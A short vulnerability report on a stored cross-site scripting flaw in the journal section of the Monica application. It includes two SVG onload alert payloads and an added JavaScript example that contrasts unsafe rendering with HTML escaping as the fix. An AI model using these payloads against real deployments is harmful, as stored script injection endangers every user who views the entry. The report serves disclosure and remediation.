HTML code can be entered and successfully run in the journal section of Monica, which allows an attacker to trigger XSS payloads such as <svg/onload=alert("StoredXSS")>, causing a persistent stored XSS in the journal section.
files at monica/2.
<3
<svg/onload=alert("blah!!,blah!!!,blah!!!!")>
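A small model of the behaviour described above, next to output encoding as the fix. This is an added illustration, not Monica's code: the in-memory journal, the function names and the wrapper markup are all assumptions.

```javascript
// Added illustration; not Monica's code. All names here are hypothetical.

// Characters that are significant in an HTML text or attribute context.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Constructed in-memory stand-in for the journal storage.
const journal = [];
function addEntry(author, body) {
  journal.push({ author, body }); // stored verbatim; encoding belongs at output time
}

// "Before": the stored body is concatenated into markup, so any stored
// element or event handler becomes live for every user who views the entry.
function renderUnsafe(entry) {
  return `<div class="journal-entry">${entry.body}</div>`;
}

// "After": the stored body is encoded for the HTML text context.
function renderEscaped(entry) {
  return `<div class="journal-entry">${escapeHtml(entry.body)}</div>`;
}

// Regression check: does anything inside the wrapper still open a tag?
function containsInjectedMarkup(html) {
  const inner = html.replace(/^<div class="journal-entry">/, "").replace(/<\/div>$/, "");
  return /<[a-zA-Z\/!]/.test(inner);
}

// Constructed sample entries: the payload from the report and a benign "<3".
addEntry("alice", '<svg/onload=alert("StoredXSS")>');
addEntry("bob", "Lunch with Sam <3 & coffee");

for (const entry of journal) {
  console.log(entry.author,
    "unsafe:", containsInjectedMarkup(renderUnsafe(entry)),
    "escaped:", containsInjectedMarkup(renderEscaped(entry)));
}
```

Encoding at render time keeps the stored text intact, so a legitimate entry such as "<3" still displays as typed while the payload is shown as inert text.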